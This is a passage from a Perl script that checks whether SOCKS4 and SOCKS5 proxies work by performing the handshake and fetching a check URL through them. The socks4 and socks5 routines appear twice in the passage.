10888.           return {'code' => -1, 'message' => 'Too short response from proxy'} if length $resp < 8;
10889.           my @bytes = unpack 'C*', $resp;
10890.           @bytes = map {sprintf '%.2x', $_} @bytes;
10891.           my $code = ord (substr $resp, 0, 1);
10892.           return {'code' => -2, 'message' => 'Not Socks4 proxy'} unless $code == 0 or $code == 4;
10893.           $code = ord (substr $resp, 1, 1);
10894.           return {'code' => -3, 'message' => 'Request rejected'} unless $code == 0x5a;
10895.           undef $resp;
10896.           $resp = send_query ($sock, $query);
10897.           return {'code' => -5, 'message' => 'Cannot connect to check URL. Please check it'}
10898.           unless $resp =~ /200 OK/ or defined $resp;
10899.           my $ret = parse_content ($resp);
10900.           close $sock;
10901.           return $ret;
10902.      }
10903.      sub socks5 {
10904.           my ($proxy_host, $proxy_port, $timeout1) = @_;
10905.           my $sock = IO::Socket::INET->new (
10906.                       'PeerAddr' => $proxy_host,
10907.                       'PeerPort' => $proxy_port,
10908.                       'Proto' => 'tcp',
10909.                       'Timeout' => $timeout1
10910.                       ) or return {'code' => -1, 'message' => "Connection error: $@"};
10911.           syswrite $sock, $sk5_conn0, length $sk5_conn0;
10912.           my $resp;
10913.           sysread $sock, $resp, 2;
10914.           return {'code' => -1, 'message' => 'Too short first response from server'} if length $resp < 2;
10915.           my @bytes = unpack 'C*', $resp;
10916.           @bytes = map {sprintf '%.2x', $_} @bytes;
10917.           my $code = ord (substr $resp, 0, 1);
10918.           return {'code' => -2, 'message' => 'Not Socks5 proxy'} unless $code == 5;
10919.           $code = ord (substr $resp, 1, 1);
10920.           return {'code' => -3, 'message' => '\'No authentication\' method not supported'} unless $code == 0;
10921.           syswrite $sock, $sk5_conn1, length $sk5_conn1;
10922.           sysread $sock, $resp, 10;
10923.           return {'code' => -4, 'message' => 'Empty response'}
10924.           if length $resp == 0 or not defined $resp;
10925.           return {'code' => -1, 'message' => 'Too short second response from proxy'} if length $resp < 10;
10926.           @bytes = unpack 'C*', $resp;
10927.           @bytes = map {sprintf '%.2x', $_} @bytes;
10928.           $code = ord (substr $resp, 1, 1);
10929.           return {'code' => -5, 'message' => 'Connection rejected'} unless $code == 0;
10930.           $code = substr $resp, 4, 4;
10931.           return {'code' => -6, 'message' => 'SOCKS5 error'} if $code eq "\x00" x 4;
10932.           undef $resp;
10933.           $resp = send_query ($sock, $query);
10934.           return {'code' => -7, 'message' => 'Cannot connect to check URL. Please change it'}
10935.           unless $resp =~ /200 OK/ or defined $resp;
10936.           my $ret = parse_content ($resp);
10937.           close $sock;
10938.           return $ret;
10939.      }
10940. }
10941. sub socks_get {
10942.     $check_port = 80;
10943.     my $check_hostent = gethostbyname ($check_host);
10944.     our $sk4_conn = "\x04"
10945.                   . "\x01"
10946.                   . pack ('n', $check_port)
10947.                   . $check_hostent
10948.                   . "\x00";
10949.     our $sk5_conn0 = "\x05"
10950.                    . "\x01"
10951.                    . "\x00";
10952.     our $sk5_conn1 = "\x05"
10953.                    . "\x01"
10954.                    . "\x00"
10955.                    . "\x01"
10956.                    . $check_hostent
10957.                    . pack ('n', $check_port);
10958.     $s_host = $current_proxy_host;
10959.     $s_port = $current_proxy_port;
10960.     if ($socks_type == 4) {
10961.          $res1 = socks4($s_host,$s_port,$timeout);
10962.          return $res1->{'message'};
10963.     } else {
10964.          $res1 = socks5($s_host,$s_port,$timeout);
10965.          return $res1->{'message'};
10966.     }
10967.     sub send_query {
10968.          my ($sock, $query) = @_;
10969.          syswrite $sock, $query, length $query;
10970.          my ($resp, $buf);
10971.          $resp .= $buf while sysread $sock, $buf, 4098;
10972.          return $resp;
10973.     }
10974.     sub parse_content {
10975.          my $content = shift;
10976.          my %ret;
10977.          if ($content) {
10978.              ($ret{'code'}, $ret{'message'}) = (0, $content);
10979.          } else {
10980.              ($ret{'code'}, $ret{'message'}) = (-1, "");
10981.          }
10982.          return \%ret;
10983.     }
10984.     sub socks4 {
10985.          my ($proxy_host, $proxy_port, $timeout1) = @_;
10986.          my $sock = IO::Socket::INET->new (
10987.                      'PeerAddr' => $proxy_host,
10988.                      'PeerPort' => $proxy_port,
10989.                      'Proto' => 'tcp',
10990.                      'Timeout' => $timeout1
10991.                      ) or return {'code' => -1, 'message' => "Connection error: $@"};
10992.          syswrite $sock, $sk4_conn, length $sk4_conn;
10993.          my $resp;
10994.          sysread $sock, $resp, 8; # ????? ????? ?????? ???? ?????? 8 ????
10995.          return {'code' => -1, 'message' => 'Empty response'}
10996.          if length $resp == 0 or not defined $resp;
10997.          return {'code' => -1, 'message' => 'Too short response from proxy'} if length $resp < 8;
10998.          my @bytes = unpack 'C*', $resp;
10999.          @bytes = map {sprintf '%.2x', $_} @bytes;
11000.          my $code = ord (substr $resp, 0, 1);
11001.          return {'code' => -2, 'message' => 'Not Socks4 proxy'} unless $code == 0 or $code == 4;
11002.          $code = ord (substr $resp, 1, 1);
11003.          return {'code' => -3, 'message' => 'Request rejected'} unless $code == 0x5a;
11004.          undef $resp;
11005.          $resp = send_query ($sock, $query);
11006.          return {'code' => -5, 'message' => 'Cannot connect to check URL. Please check it'}
11007.          unless $resp =~ /200 OK/ or defined $resp;
11008.          my $ret = parse_content ($resp);
11009.          close $sock;
11010.          return $ret;
11011.     }
11012.     sub socks5 {
11013.          my ($proxy_host, $proxy_port, $timeout1) = @_;
11014.          my $sock = IO::Socket::INET->new (
11015.                      'PeerAddr' => $proxy_host,
11016.                      'PeerPort' => $proxy_port,
11017.                      'Proto' => 'tcp',
11018.                      'Timeout' => $timeout1
11019.                      ) or return {'code' => -1, 'message' => "Connection error: $@"};
11020.          syswrite $sock, $sk5_conn0, length $sk5_conn0;
11021.          my $resp;
11022.          sysread $sock, $resp, 2;
11023.          return {'code' => -1, 'message' => 'Too short first response from server'} if length $resp < 2;
11024.          my @bytes = unpack 'C*', $resp;
11025.          @bytes = map {sprintf '%.2x', $_} @bytes;
11026.          my $code = ord (substr $resp, 0, 1);
11027.          return {'code' => -2, 'message' => 'Not Socks5 proxy'} unless $code == 5;
11028.          $code = ord (substr $resp, 1, 1);
11029.          return {'code' => -3, 'message' => '\'No authentication\' method not supported'} unless $code == 0;
11030.          syswrite $sock, $sk5_conn1, length $sk5_conn1;
11031.          sysread $sock, $resp, 10;
11032.          return {'code' => -4, 'message' => 'Empty response'}
11033.          if length $resp == 0 or not defined $resp;
11034.          return {'code' => -1, 'message' => 'Too short second response from proxy'} if length $resp < 10;
11035.          @bytes = unpack 'C*', $resp;
11036.          @bytes = map {sprintf '%.2x', $_} @bytes;
11037.          $code = ord (substr $resp, 1, 1);
11038.          return {'code' => -5, 'message' => 'Connection rejected'} unless $code == 0;
11039.          $code = substr $resp, 4, 4;
11040.          return {'code' => -6, 'message' => 'SOCKS5 error'} if $code eq "\x00" x 4;
11041.          undef $resp;
11042.          $resp = send_query ($sock, $query);
11043.          return {'code' => -7, 'message' => 'Cannot connect to check URL. Please change it'}
11044.          unless $resp =~ /200 OK/ or defined $resp;
11045.          my $ret = parse_content ($resp);
11046.          close $sock;
11047.          return $ret;
11048.     }
11049. }